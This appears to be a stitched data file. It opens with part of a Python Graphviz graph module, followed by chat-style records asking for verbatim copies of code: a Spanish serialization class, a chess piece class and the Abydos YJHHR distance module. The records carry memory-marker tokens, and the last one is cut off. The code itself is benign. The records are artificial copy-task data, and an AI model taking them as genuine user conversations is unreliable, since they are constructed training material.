# If ratio = "expand", the size attribute is set, and both the width and
# the height of the graph are less than the value in size, node positions
# are scaled uniformly until at least one dimension fits size exactly.
# Note that this is distinct from using size as the desired size, as here
# the drawing is expanded before edges are generated and all node and text
# sizes remain unchanged.
#
# If ratio = "auto", the page attribute is set and the graph cannot be
# drawn on a single page, then size is set to an ``ideal'' value. In
# particular, the size in a given dimension will be the smallest integral
# multiple of the page size in that dimension which is at least half the
# current size. The two dimensions are then scaled independently to the new
# size. This feature only works in dot.
# ratio = Either(Float, Enum("fill", "compress", "expand", "auto"),
ratio = Enum("fill", "compress", "expand", "auto",
desc="aspect ratio (drawing height/drawing width) for the drawing",
graphviz=True)
# If true and there are multiple clusters, run cross minimization a second
# time.
remincross = Bool(False, desc="If true and there are multiple clusters, "
"run cross minimization a second", label="Re-cross minimization",
graphviz=True)
# This is a synonym for the <html:a rel="attr">dpi</html:a> attribute.
resolution = Alias("dpi", desc="a synonym for the dpi attribute",
graphviz=True)
# This specifies nodes to be used as the center of the
# layout and the root of the generated spanning tree. As a graph attribute,
# this gives the name of the node. As a node attribute (circo only), it
# specifies that the node should be used as a central node. In twopi,
# this will actually be the central node. In circo, the block containing
# the node will be central in the drawing of its connected component.
# If not defined,
# twopi will pick a most central node, and circo will pick a random node.
root = root_trait
# If 90, set drawing orientation to landscape.
rotate = Range(0, 360, desc="drawing orientation", graphviz=True)
# During network simplex, maximum number of edges with negative cut values
# to search when looking for one with minimum cut value.
searchsize = Int(30, desc="maximum number of edges with negative cut "
"values to search when looking for one with minimum cut value",
label="Search size", graphviz=True)
# Fraction to increase polygons (multiply
# coordinates by 1 + sep) for purposes of determining overlap. Guarantees
# a minimal non-zero distance between nodes.
# If unset but <html:a rel="attr">esep</html:a> is defined, <html:a rel="attr">sep</html:a> will be
# set to <html:code>esep/0.8</html:code>. If <html:a rel="attr">esep</html:a> is unset, the default value
# is used.
#
# When <html:a rel="attr">overlap</html:a>="ipsep" or "vpsc",
# <html:a rel="attr">sep</html:a> gives a minimum distance, in inches, to be left between nodes.
# In this case, if <html:a rel="attr">sep</html:a> is a pointf, the x and y separations can be
# specified separately.
sep = Int(4, desc="Fraction to increase polygons (multiply coordinates by "
"1 + sep) for purposes of determining overlap", label="Separation",
graphviz=True)
# Print guide boxes in PostScript at the beginning of
# routesplines if 1, or at the end if 2. (Debugging)
showboxes = showboxes_trait
# Maximum width and height of drawing, in inches.
# If defined and the drawing is too large, the drawing is uniformly
# scaled down so that it fits within the given size.
#
# If <html:a rel="attr">size</html:a> ends in an exclamation point (<html:tt>!</html:tt>),
# then it is taken to be
# the desired size. In this case, if both dimensions of the drawing are
# less than <html:a rel="attr">size</html:a>, the drawing is scaled up uniformly until at
# least one dimension equals its dimension in <html:a rel="attr">size</html:a>.
#
# Note that there is some interaction between the <html:a rel="attr">size</html:a> and
# <html:a rel="attr">ratio</html:a> attributes.
size = pointf_trait
# Controls how, and if, edges are represented. If true, edges are drawn as
# splines routed around nodes; if false, edges are drawn as line segments.
# If set to "", no edges are drawn at all.
#
# (1 March 2007) The values <html:span class="val">line</html:span> and <html:span class="val">spline</html:span> can be
# used as synonyms for <html:span class="val">false</html:span> and <html:span class="val">true</html:span>, respectively.
# In addition, the value <html:span class="val">polyline</html:span> specifies that edges should be
# drawn as polylines.
#
# By default, the attribute is unset. How this is interpreted depends on
# the layout. For dot, the default is to draw edges as splines. For all
# other layouts, the default is to draw edges as line segments. Note that
# for these latter layouts, if <html:code>splines="true"</html:code>, this
# requires non-overlapping nodes (cf. <html:a rel="attr">overlap</html:a>).
# If fdp is used for layout and <html:tt>splines="compound"</html:tt>, then the edges are
# drawn to avoid clusters as well as nodes.
splines = Enum("True", "False", "",
desc="how, and if, edges are represented", graphviz=True)
# Parameter used to determine the initial layout of nodes. If unset, the
# nodes are randomly placed in a unit square with
# the same seed is always used for the random number generator, so the
# initial placement is repeatable.
#
#
# has the syntax [style][seed].
#
# If style is present, it must be one of the strings "regular", "self", or
# "random". In the first case, the nodes are placed regularly about a
# circle. In the second case, an abbreviated version of neato is run to
# obtain the initial layout. In the last case, the nodes are placed
# randomly in a unit square.
#
# If seed is present, it specifies a seed for the random number generator.
# If seed is a positive number, this is used as the seed. If it is anything
# else, the current time, and possibly the process id, is used to pick a
# seed, thereby making the choice more random. In this case, the seed value
# is stored in the graph.
#
# If the value is just "random", a time-based seed is chosen.
#
# Note that input positions, specified by a node's pos attribute, are only
# used when the style is "random".
start = start_trait
# A URL or pathname specifying an XML style sheet, used in SVG output.
stylesheet = Str(desc="URL or pathname specifying an XML style sheet",
label="Style sheet", graphviz=True)
# If the object has a URL, this attribute determines which window
# of the browser is used for the URL.
# See <html:a href="http://www.w3.org/TR/html401/present/frames.html#adef-target">W3C documentation</html:a>.
target = target_trait
# If set explicitly to true or false, the value determines whether or not
# internal bitmap rendering relies on a truecolor color model or uses
# a color palette.
# If the attribute is unset, truecolor is not used
# unless there is a <html:a rel="attr">shapefile</html:a> property
# for some node in the graph.
# The output model will use the input model when possible.
#
# Use of color palettes results in less memory usage during creation of the
# bitmaps and smaller output files.
#
# Usually, the only time it is necessary to specify the truetype model
# is if the graph uses more than 256 colors.
# However, if one uses <html:a rel="attr">bgcolor</html:a>=transparent with
# a color palette, font
# antialiasing can show up as a fuzzy white area around characters.
# Using <html:a rel="attr">truecolor</html:a>=true avoids this problem.
truecolor = Bool(True, desc="bitmap rendering relies on a truecolor color "
"model or uses a color palette", graphviz=True)
# Hyperlinks incorporated into device-dependent output.
# At present, used in ps2, cmap, i*map and svg formats.
# For all these formats, URLs can be attached to nodes, edges and
# clusters. URL attributes can also be attached to the root graph in ps2,
# cmap and i*map formats. This serves as the base URL for relative URLs in the
# former, and as the default image map file in the latter.
#
# For svg, cmapx and imap output, the active area for a node is its
# visible image.
# For example, an unfilled node with no drawn boundary will only be active on its label.
# For other output, the active area is its bounding box.
# The active area for a cluster is its bounding box.
# For edges, the active areas are small circles where the edge contacts its head
# and tail nodes. In addition, for svg, cmapx and imap, the active area
# includes a thin polygon approximating the edge. The circles may
# overlap the related node, and the edge URL dominates.
# If the edge has a label, this will also be active.
# Finally, if the edge has a head or tail label, this will also be active.
#
# Note that, for edges, the attributes <html:a rel="attr">headURL</html:a>,
# <html:a rel="attr">tailURL</html:a>, <html:a rel="attr">labelURL</html:a> and
# <html:a rel="attr">edgeURL</html:a> allow control of various parts of an
# edge. Also note that, if active areas of two edges overlap, it is unspecified
# which area dominates.
URL = Str(desc="hyperlinks incorporated into device-dependent output",
label="URL", graphviz=True)
# Clipping window on final drawing.
#
# "%lf,%lf,%lf,%lf,%lf" or "%lf,%lf,%lf,"%s""
#
# The viewPort W,H,Z,x,y or W,H,Z,N specifies a viewport for the final
# image. The pair (W,H) gives the dimensions (width and height) of the
# final image, in points. The optional Z is the zoom factor, i.e., the
# image in the original layout will be W/Z by H/Z points in size. By
# default, Z is 1. The optional last part is either a pair (x,y) giving a
# position in the original layout of the graph, in points, of the center of
# the viewport, or the name N of a node whose center should used as the
# focus. By default, the focus is the center of the graph bounding box,
# i.e., (bbx/2,bby/2), where "bbx,bby" is the value of the bounding box
# attribute bb.
#
# Sample values: 50,50,.5,'2.8 BSD' or 100,100,2,450,300. The first will
# take the 100x100 point square centered on the node 2.8 BSD and scale it
# down by 0.5, yielding a 50x50 point final image.
viewport = Tuple(Float, Float, Float, Float, Float, graphviz=True)
# Either(
# Tuple(Float, Float, Float, Float, Float),
# Tuple(Float, Float, Float, Str),
# desc="clipping window on final drawing"
# )
voro_margin = Float(0.05, desc="Factor to scale up drawing to allow "
"margin for expansion in Voronoi technique. dim' = (1+2*margin)*dim.",
label="Voronoi margin", graphviz=True)
# def _defaultdist_default(self):
# """ Trait initialiser """
#
# return 1+(avg. len)*math.sqrt(|V|)
#--------------------------------------------------------------------------
# Views:
#--------------------------------------------------------------------------
traits_view = tabbed_view
# traits_view = graph_view
#--------------------------------------------------------------------------
# "object" interface:
#--------------------------------------------------------------------------
def __init__(self, *args, **kw_args):
""" Initialises the graph.
"""
super(Graph, self).__init__(*args, **kw_args)
# Listen for the addition or removal of nodes and update each branch's
# list of available nodes so that they can move themselves.
self.on_trait_change(self._on_nodes, "subgraphs*.nodes")
self.on_trait_change(self._on_nodes, "subgraphs*.nodes_items")
# Listen for the addition of edges and check that the heado_node and
# tail_node instances exist in the graph or any subgraphs.
self.on_trait_change(self._on_edges, "subgraphs*.edges")
self.on_trait_change(self._on_edges, "subgraphs*.edges_items")
def __str__(self):
""" Returns a string representation of the graph in dot language. It
will return the graph and all its subelements in string form.
"""
s = ""
if self.strict:
s += "strict "
if self.directed:
s += "digraph"
else:
s += "graph"
return "%s %s" % ( s, super(Graph, self).__str__() )
#--------------------------------------------------------------------------
# Public interface:
#--------------------------------------------------------------------------
@on_trait_change("arrange")
def arrange_all(self):
""" Sets for the _draw_ and _ldraw_ attributes for each of the graph
sub-elements by processing the xdot format of the graph.
"""
import godot.dot_data_parser
parser = godot.dot_data_parser.GodotDataParser()
xdot_data = self.create( format = "xdot" )
# print "GRAPH DOT:\n", str( self )
# print "XDOT DATA:\n", xdot_data
parser.dotparser.parseWithTabs()
ndata = xdot_data.replace( "\\\n", "" )
tokens = parser.dotparser.parseString( ndata )[0]
parser.build_graph( graph=self, tokens=tokens[3] )
self.redraw_canvas()
@on_trait_change("redraw")
def redraw_canvas(self):
""" Parses the Xdot attributes of all graph components and adds
the components to a new canvas.
"""
from xdot_parser import XdotAttrParser
xdot_parser = XdotAttrParser()
canvas = self._component_default()
for node in self.nodes:
components = xdot_parser.parse_xdot_data( node._draw_ )
canvas.add( *components )
components = xdot_parser.parse_xdot_data( node._ldraw_ )
canvas.add( *components )
for edge in self.edges:
components = xdot_parser.parse_xdot_data( edge._draw_ )
canvas.add( *components )
components = xdot_parser.parse_xdot_data( edge._ldraw_ )
canvas.add( *components )
components = xdot_parser.parse_xdot_data( edge._hdraw_ )
canvas.add( *components )
components = xdot_parser.parse_xdot_data( edge._tdraw_ )
canvas.add( *components )
components = xdot_parser.parse_xdot_data( edge._hldraw_ )
canvas.add( *components )
components = xdot_parser.parse_xdot_data( edge._tldraw_ )
canvas.add( *components )
self.component = canvas
self.vp.request_redraw()
def get_node(self, ID):
""" Returns a node given an ID or None if no such node exists.
"""
node = super(Graph, self).get_node(ID)
if node is not None:
return node
for graph in self.all_graphs:
for each_node in graph.nodes:
if each_node.ID == ID:
return each_node
else:
return None
# def write(self, path, prog=None, format=None):
# """ Writes a graph to a file.
#
# Given a filename 'path' it will open/create and truncate
# such file and write on it a representation of the graph
# defined by the dot object and in the format specified by
# 'format'.
# The format 'raw' is used to dump the string representation
# of the Dot object, without further processing.
# The output can be processed by any of graphviz tools, defined
# in 'prog', which defaults to 'dot'
# Returns True or False according to the success of the write
# operation.
# """
#
# if prog is None:
# prog = self.program
#
# if format is None:
# format = self.format
#
#
# dot_fd = None
# try:
# dot_fd = open( path, "wb" )
## dot_fd = file( path, "w+b" )
# if format == 'raw':
# dot_fd.write( self.to_string() )
# else:
# dot_fd.write( self.create( prog, format ) )
# finally:
# if dot_fd is not None:
# dot_fd.close()
#
# return True
#--------------------------------------------------------------------------
# Trait initialisers:
#--------------------------------------------------------------------------
def _component_default(self):
""" Trait initialiser. Overrides the base class to use a Canvas
for the root Graph.
"""
return Canvas( draw_axes=True, bgcolor="lightsteelblue")
def _epsilon_default(self):
""" Trait initialiser.
"""
if self.mode == "KK":
return 0.0001 * len(self.nodes)
else:
return 0.0001
def _maxiter_default(self):
""" Trait initialiser.
"""
mode = self.mode
if mode == "KK":
return 100 * len(self.nodes)
elif mode == "major":
return 200
else:
return 600
#--------------------------------------------------------------------------
# Property getters:
#--------------------------------------------------------------------------
def _get_all_graphs(self):
""" Property getter.
"""
top_graph = self
def get_subgraphs(graph):
assert isinstance(graph, BaseGraph)
subgraphs = graph.subgraphs[:]
for subgraph in graph.subgraphs:
subsubgraphs = get_subgraphs(subgraph)
subgraphs.extend(subsubgraphs)
return subgraphs
subgraphs = get_subgraphs(top_graph)
return [top_graph] + subgraphs
#--------------------------------------------------------------------------
# Event handlers:
#--------------------------------------------------------------------------
def _directed_changed(self, new):
""" Sets the connection string for all edges.
"""
if new:
conn = "->"
else:
conn = "--"
for edge in [e for g in self.all_graphs for e in g.edges]:
edge.conn = conn
def _on_nodes(self):
""" Maintains each branch's list of available nodes in order that they
may move themselves (InstanceEditor values).
"""
all_graphs = self.all_graphs
all_nodes = [n for g in all_graphs for n in g.nodes]
for graph in all_graphs:
for edge in graph.edges:
edge._nodes = all_nodes
def _on_edges(self, object, name, old, new):
""" Handles the list of edges for any graph changing.
"""
if name == "edges_items":
edges = new.added
elif name == "edges":
edges = new
else:
edges = []
all_nodes = [n for g in self.all_graphs for n in g.nodes]
for each_edge in edges:
# Ensure the edge's nodes exist in the graph.
if each_edge.tail_node not in all_nodes:
object.nodes.append( each_edge.tail_node )
if each_edge.head_node not in all_nodes:
object.nodes.append( each_edge.head_node )
# Initialise the edge's list of available nodes.
each_edge._nodes = all_nodes
# def _bgcolor_changed(self, new):
# """ Handles the canvas background colour.
# """
# self.canvas.bgcolor = new
#------------------------------------------------------------------------------
# Stand-alone call:
#------------------------------------------------------------------------------
if __name__ == "__main__":
import sys
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.DEBUG)
# from godot.graph import Graph
graph = Graph(ID="Foo", directed=True, label="Foo Graph")
node1 = Node("node1", label="Node 1", shape="rectangle")
graph.add_node( node1 )
node2 = Node("node2", label="Node 2")
graph.add_node( node2 )
graph.add_edge(node1, node2)
# subgraph1 = Subgraph(ID="subgraph1", rank="min")
# subgraph1.nodes.append(Node("node3", label="Node 3"))
# graph.subgraphs.append(subgraph1)
#
# subgraph2 = Subgraph(ID="subgraph2", rank="max")
# subgraph2.nodes.append(Node("node4", label="Node 4"))
# subgraph1.subgraphs.append(subgraph2)
# from godot.component.component_viewer import ComponentViewer
# viewer = ComponentViewer(component=graph.component)
# viewer.configure_traits()
# graph.write("/tmp/graph.xdot", "dot", "xdot")
# graph.arrange_all()
# print write_dot_graph(graph)
graph.configure_traits()
# EOF +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
```
|
[
{
"content": "Here is some code:\n```python\nimport json\n# Descarga esta librería con el comando 'pip install json2html'\nfrom json2html import *\n\nclass Usuario(object):\n #si ya tenemos definidos nuestros atributos no es necesario pedir con **args\n def __init__(self, nombre,edad,direccion):\n self.nombre = nombre\n self.edad = edad\n self.direccion = direccion\n\n #Quite los getters y setters ya que no tenian caso de ser porque desde la misma instancia del objeto se pueden llamar a los\n #atributos o asignarles valores\n\n def __str__(self):\n return \"\"\"\n Nombre: {}\\nEdad: {}\\nDireccion: {}\\n\n \"\"\".format(self.nombre, self.edad, self.direccion).strip()\n\n \n def serializar(self, formato='diccionario'):\n formato = formato.lower()\n #Quite el formato de string ya que la misma funcion de str nos devulve ese formato\n if formato == 'diccionario':\n return self.__dict__\n elif formato == 'json':\n return json.dumps(self.__dict__)\n elif formato == 'html':\n return json2html.convert(json=json.dumps(self.__dict__))\n\n \n\n\nuser = Usuario(\n nombre='Ramanujan',\n edad=25,\n direccion='Calle X, #Y Colonia Z'\n)\n\nprint(user)\nprint(user.serializar(\"html\"))\n\n\n#¿Qué sucedería si quiero agregar otro formato de serialización más complejo como XML o Yaml?\n#Solo se agregaria un if que evalue, si entra en ese if, lo ideal seria crear una funcion que haga todo el proceso\n#de esta forma tendriamos la funcion que evalua a que tipo de formato se quiere pasar y una funcion\n#que pase a xml o yalm\n\n#¿Qué sucedería si quiero soporte para serialización a otros objetos aparte de los instanciados por la clase Usuario?\n#EN ese caso lo ideal seria sacar las funciones del objeto usuario y crear una clase especifica\n#para realizar la serializacion, que no dependa del usuario si no que se llame cuando sea\n```\nOutput it word-for-word.",
"role": "user"
}
] |
[
{
"content": "Here is some code:\n<|memory_start|>```python\nimport json\n# Descarga esta librería con el comando 'pip install json2html'\nfrom json2html import *\n\nclass Usuario(object):\n #si ya tenemos definidos nuestros atributos no es necesario pedir con **args\n def __init__(self, nombre,edad,direccion):\n self.nombre = nombre\n self.edad = edad\n self.direccion = direccion\n\n #Quite los getters y setters ya que no tenian caso de ser porque desde la misma instancia del objeto se pueden llamar a los\n #atributos o asignarles valores\n\n def __str__(self):\n return \"\"\"\n Nombre: {}\\nEdad: {}\\nDireccion: {}\\n\n \"\"\".format(self.nombre, self.edad, self.direccion).strip()\n\n \n def serializar(self, formato='diccionario'):\n formato = formato.lower()\n #Quite el formato de string ya que la misma funcion de str nos devulve ese formato\n if formato == 'diccionario':\n return self.__dict__\n elif formato == 'json':\n return json.dumps(self.__dict__)\n elif formato == 'html':\n return json2html.convert(json=json.dumps(self.__dict__))\n\n \n\n\nuser = Usuario(\n nombre='Ramanujan',\n edad=25,\n direccion='Calle X, #Y Colonia Z'\n)\n\nprint(user)\nprint(user.serializar(\"html\"))\n\n\n#¿Qué sucedería si quiero agregar otro formato de serialización más complejo como XML o Yaml?\n#Solo se agregaria un if que evalue, si entra en ese if, lo ideal seria crear una funcion que haga todo el proceso\n#de esta forma tendriamos la funcion que evalua a que tipo de formato se quiere pasar y una funcion\n#que pase a xml o yalm\n\n#¿Qué sucedería si quiero soporte para serialización a otros objetos aparte de los instanciados por la clase Usuario?\n#EN ese caso lo ideal seria sacar las funciones del objeto usuario y crear una clase especifica\n#para realizar la serializacion, que no dependa del usuario si no que se llame cuando sea\n```<|memory_end|>\nOutput it word-for-word.",
"role": "user"
}
] |
```python
import json
# Descarga esta librería con el comando 'pip install json2html'
from json2html import *
class Usuario(object):
#si ya tenemos definidos nuestros atributos no es necesario pedir con **args
def __init__(self, nombre,edad,direccion):
self.nombre = nombre
self.edad = edad
self.direccion = direccion
#Quite los getters y setters ya que no tenian caso de ser porque desde la misma instancia del objeto se pueden llamar a los
#atributos o asignarles valores
def __str__(self):
return """
Nombre: {}\nEdad: {}\nDireccion: {}\n
""".format(self.nombre, self.edad, self.direccion).strip()
def serializar(self, formato='diccionario'):
formato = formato.lower()
#Quite el formato de string ya que la misma funcion de str nos devulve ese formato
if formato == 'diccionario':
return self.__dict__
elif formato == 'json':
return json.dumps(self.__dict__)
elif formato == 'html':
return json2html.convert(json=json.dumps(self.__dict__))
user = Usuario(
nombre='Ramanujan',
edad=25,
direccion='Calle X, #Y Colonia Z'
)
print(user)
print(user.serializar("html"))
#¿Qué sucedería si quiero agregar otro formato de serialización más complejo como XML o Yaml?
#Solo se agregaria un if que evalue, si entra en ese if, lo ideal seria crear una funcion que haga todo el proceso
#de esta forma tendriamos la funcion que evalua a que tipo de formato se quiere pasar y una funcion
#que pase a xml o yalm
#¿Qué sucedería si quiero soporte para serialización a otros objetos aparte de los instanciados por la clase Usuario?
#EN ese caso lo ideal seria sacar las funciones del objeto usuario y crear una clase especifica
#para realizar la serializacion, que no dependa del usuario si no que se llame cuando sea
```
|
[
{
"content": "Recreate the entire code block with identical formatting:\n```python\nfrom Coordinate import Coordinate as C\nfrom Move import Move\n\nWHITE = True\nBLACK = False\nX = 0\nY = 1\n\n\nclass Piece:\n\n def __init__(self, board, side, position, movesMade=0):\n self.board = board\n self.side = side\n self.position = position\n self.movesMade = 0\n\n def __str__(self):\n sideString = 'White' if self.side == WHITE else 'Black'\n return 'Type : ' + type(self).__name__ + \\\n ' - Position : ' + str(self.position) + \\\n \" - Side : \" + sideString + \\\n ' -- Value : ' + str(self.value) + \\\n \" -- Moves made : \" + str(self.movesMade)\n\n def move_in_direction(self, pos, direction, side):\n '''\n Get next move in specified direction\n\n @param pos - current position of the piece\n @param direction - direction to move to, in format [x_off, y_off]\n @param side - which side the piece is: WHITE or BLACK\n @return a Move() object which describes the next move of current piece\n '''\n for dis in range(1, 8):\n movement = C(dis * direction[X], dis * direction[Y])\n new_pos = pos + movement\n if self.board.is_valid_pos(new_pos):\n piece_at_pos = self.board.get_piece_at_pos(new_pos)\n if piece_at_pos is None:\n yield Move(self, new_pos)\n\n elif piece_at_pos is not None:\n if piece_at_pos.side != side:\n yield Move(self, new_pos, piece_to_capture=piece_at_pos)\n return\n\n def __eq__(self, other):\n if self.board == other.board and \\\n self.side == other.side and \\\n self.position == other.position and \\\n self.__class__ == other.__class__:\n return True\n return False\n\n def copy(self):\n cpy = self.__class__(self.board, self.side, self.position,\n movesMade=self.movesMade)\n return cpy\n```",
"role": "user"
}
] |
[
{
"content": "Recreate the entire code block with identical formatting:\n<|memory_start|>```python\nfrom Coordinate import Coordinate as C\nfrom Move import Move\n\nWHITE = True\nBLACK = False\nX = 0\nY = 1\n\n\nclass Piece:\n\n def __init__(self, board, side, position, movesMade=0):\n self.board = board\n self.side = side\n self.position = position\n self.movesMade = 0\n\n def __str__(self):\n sideString = 'White' if self.side == WHITE else 'Black'\n return 'Type : ' + type(self).__name__ + \\\n ' - Position : ' + str(self.position) + \\\n \" - Side : \" + sideString + \\\n ' -- Value : ' + str(self.value) + \\\n \" -- Moves made : \" + str(self.movesMade)\n\n def move_in_direction(self, pos, direction, side):\n '''\n Get next move in specified direction\n\n @param pos - current position of the piece\n @param direction - direction to move to, in format [x_off, y_off]\n @param side - which side the piece is: WHITE or BLACK\n @return a Move() object which describes the next move of current piece\n '''\n for dis in range(1, 8):\n movement = C(dis * direction[X], dis * direction[Y])\n new_pos = pos + movement\n if self.board.is_valid_pos(new_pos):\n piece_at_pos = self.board.get_piece_at_pos(new_pos)\n if piece_at_pos is None:\n yield Move(self, new_pos)\n\n elif piece_at_pos is not None:\n if piece_at_pos.side != side:\n yield Move(self, new_pos, piece_to_capture=piece_at_pos)\n return\n\n def __eq__(self, other):\n if self.board == other.board and \\\n self.side == other.side and \\\n self.position == other.position and \\\n self.__class__ == other.__class__:\n return True\n return False\n\n def copy(self):\n cpy = self.__class__(self.board, self.side, self.position,\n movesMade=self.movesMade)\n return cpy\n```<|memory_end|>",
"role": "user"
}
] |
```python
from Coordinate import Coordinate as C
from Move import Move
WHITE = True
BLACK = False
X = 0
Y = 1
class Piece:
def __init__(self, board, side, position, movesMade=0):
self.board = board
self.side = side
self.position = position
self.movesMade = 0
def __str__(self):
sideString = 'White' if self.side == WHITE else 'Black'
return 'Type : ' + type(self).__name__ + \
' - Position : ' + str(self.position) + \
" - Side : " + sideString + \
' -- Value : ' + str(self.value) + \
" -- Moves made : " + str(self.movesMade)
def move_in_direction(self, pos, direction, side):
'''
Get next move in specified direction
@param pos - current position of the piece
@param direction - direction to move to, in format [x_off, y_off]
@param side - which side the piece is: WHITE or BLACK
@return a Move() object which describes the next move of current piece
'''
for dis in range(1, 8):
movement = C(dis * direction[X], dis * direction[Y])
new_pos = pos + movement
if self.board.is_valid_pos(new_pos):
piece_at_pos = self.board.get_piece_at_pos(new_pos)
if piece_at_pos is None:
yield Move(self, new_pos)
elif piece_at_pos is not None:
if piece_at_pos.side != side:
yield Move(self, new_pos, piece_to_capture=piece_at_pos)
return
def __eq__(self, other):
if self.board == other.board and \
self.side == other.side and \
self.position == other.position and \
self.__class__ == other.__class__:
return True
return False
def copy(self):
cpy = self.__class__(self.board, self.side, self.position,
movesMade=self.movesMade)
return cpy
```
|
[
{
"content": "Here is the snippet:\n```python\n# Copyright 2019-2020 by Christopher C. Little.\n# This file is part of Abydos.\n#\n# Abydos is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Abydos is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Abydos. If not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"abydos.distance._yjhhr.\n\nYJHHR distance\n\"\"\"\n\nfrom typing import Any, Counter as TCounter, Optional, Sequence, Set, Union\n\nfrom ._token_distance import _TokenDistance\nfrom ..tokenizer import _Tokenizer\n\n__all__ = ['YJHHR']\n\n\nclass YJHHR(_TokenDistance):\n r\"\"\"YJHHR distance.\n\n For two sets X and Y and a parameter p, YJHHR distance\n :cite:`Yang:2016` is\n\n .. math::\n\n dist_{YJHHR_p}(X, Y) =\n \\sqrt[p]{|X \\setminus Y|^p + |Y \\setminus X|^p}\n\n In :ref:`2x2 confusion table terms <confusion_table>`, where a+b+c+d=n,\n this is\n\n .. math::\n\n dist_{YJHHR} =\n \\sqrt[p]{b^p + c^p}\n\n .. versionadded:: 0.4.0\n \"\"\"\n\n def __init__(\n self,\n pval: int = 1,\n alphabet: Optional[\n Union[TCounter[str], Sequence[str], Set[str], int]\n ] = None,\n tokenizer: Optional[_Tokenizer] = None,\n intersection_type: str = 'crisp',\n **kwargs: Any\n ) -> None:\n \"\"\"Initialize YJHHR instance.\n\n Parameters\n ----------\n pval : int\n The :math:`p`-value of the :math:`L^p`-space\n alphabet : Counter, collection, int, or None\n This represents the alphabet of possible tokens.\n See :ref:`alphabet <alphabet>` description in\n :py:class:`_TokenDistance` for details.\n tokenizer : _Tokenizer\n A tokenizer instance from the :py:mod:`abydos.tokenizer` package\n intersection_type : str\n Specifies the intersection type, and set type as a result:\n See :ref:`intersection_type <intersection_type>` description in\n :py:class:`_TokenDistance` for details.\n **kwargs\n Arbitrary keyword arguments\n\n Other Parameters\n ----------------\n qval : int\n The length of each q-gram. Using this parameter and tokenizer=None\n will cause the instance to use the QGram tokenizer with this\n q value.\n metric : _Distance\n A string distance measure class for use in the ``soft`` and\n ``fuzzy`` variants.\n threshold : float\n A threshold value, similarities above which are counted as\n members of the intersection for the ``fuzzy`` variant.\n\n\n .. versionadded:: 0.4.0\n\n \"\"\"\n super(YJHHR, self).__init__(\n alphabet=alphabet,\n tokenizer=tokenizer,\n intersection_type=intersection_type,\n **kwargs\n )\n self.set_params(pval=pval)\n\n def dist_abs(self, src: str, tar: str) -> float:\n \"\"\"Return the YJHHR distance of two strings.\n\n Parameters\n ----------\n src : str\n Source string (or QGrams/Counter objects) for comparison\n tar : str\n Target string (or QGrams/Counter objects) for comparison\n\n Returns\n -------\n float\n YJHHR distance\n\n Examples\n --------\n >>> cmp = YJHHR()\n >>> cmp.dist_abs('cat', 'hat')\n 4.0\n >>> cmp.dist_abs('Niall', 'Neil')\n 7.0\n >>> cmp.dist_abs('aluminum', 'Catalan')\n 15.0\n >>> cmp.dist_abs('ATCG', 'TAGC')\n 10.0\n\n\n .. versionadded:: 0.4.0\n\n \"\"\"\n if src == tar:\n return 0.0\n\n self._tokenize(src, tar)\n\n b = self._src_only_card() ** self.params['pval']\n c = self._tar_only_card() ** self.params['pval']\n\n return float(round((b + c) ** (1 / self.params['pval']), 14))\n\n def dist(self, src: str, tar: str) -> float:\n \"\"\"Return the normalized YJHHR distance of two strings.\n\n Parameters\n ----------\n src : str\n Source string (or QGrams/Counter objects) for comparison\n tar : str\n Target string (or QGrams/Counter objects) for comparison\n\n Returns\n -------\n float\n normalized YJHHR distance\n\n Examples\n --------\n >>> cmp = YJHHR()\n >>> cmp.dist('cat', 'hat')\n 0.6666666666666666\n >>> cmp.dist('Niall', 'Neil')\n 0.7777777777777778\n >>> cmp.dist('aluminum', 'Catalan')\n 0.9375\n >>> cmp.dist('ATCG', 'TAGC')\n 1.0\n\n\n .. versionadded:: 0.4.0\n\n \"\"\"\n distance = self.dist_abs(src, tar)\n union = self._union_card()\n if union == 0:\n return 0.0\n return distance / union\n\n\nif __name__ == '__main__':\n import doctest\n\n doctest.testmod()\n```\nOutput a verbatim copy.",
"role": "user"
}
] |
[
{
"content": "Here is the snippet:\n<|memory_start|>```python\n# Copyright 2019-2020 by Christopher C. Little.\n# This file is part of Abydos.\n#\n# Abydos is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Abydos is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Abydos. If not, see <http://www.gnu.org/licenses/>.\n\n\"\"\"abydos.distance._yjhhr.\n\nYJHHR distance\n\"\"\"\n\nfrom typing import Any, Counter as TCounter, Optional, Sequence, Set, Union\n\nfrom ._token_distance import _TokenDistance\nfrom ..tokenizer import _Tokenizer\n\n__all__ = ['YJHHR']\n\n\nclass YJHHR(_TokenDistance):\n r\"\"\"YJHHR distance.\n\n For two sets X and Y and a parameter p, YJHHR distance\n :cite:`Yang:2016` is\n\n .. math::\n\n dist_{YJHHR_p}(X, Y) =\n \\sqrt[p]{|X \\setminus Y|^p + |Y \\setminus X|^p}\n\n In :ref:`2x2 confusion table terms <confusion_table>`, where a+b+c+d=n,\n this is\n\n .. math::\n\n dist_{YJHHR} =\n \\sqrt[p]{b^p + c^p}\n\n .. versionadded:: 0.4.0\n \"\"\"\n\n def __init__(\n self,\n pval: int = 1,\n alphabet: Optional[\n Union[TCounter[str], Sequence[str], Set[str], int]\n ] = None,\n tokenizer: Optional[_Tokenizer] = None,\n intersection_type: str = 'crisp',\n **kwargs: Any\n ) -> None:\n \"\"\"Initialize YJHHR instance.\n\n Parameters\n ----------\n pval : int\n The :math:`p`-value of the :math:`L^p`-space\n alphabet : Counter, collection, int, or None\n This represents the alphabet of possible tokens.\n See :ref:`alphabet <alphabet>` description in\n :py:class:`_TokenDistance` for details.\n tokenizer : _Tokenizer\n A tokenizer instance from the :py:mod:`abydos.tokenizer` package\n intersection_type : str\n Specifies the intersection type, and set type as a result:\n See :ref:`intersection_type <intersection_type>` 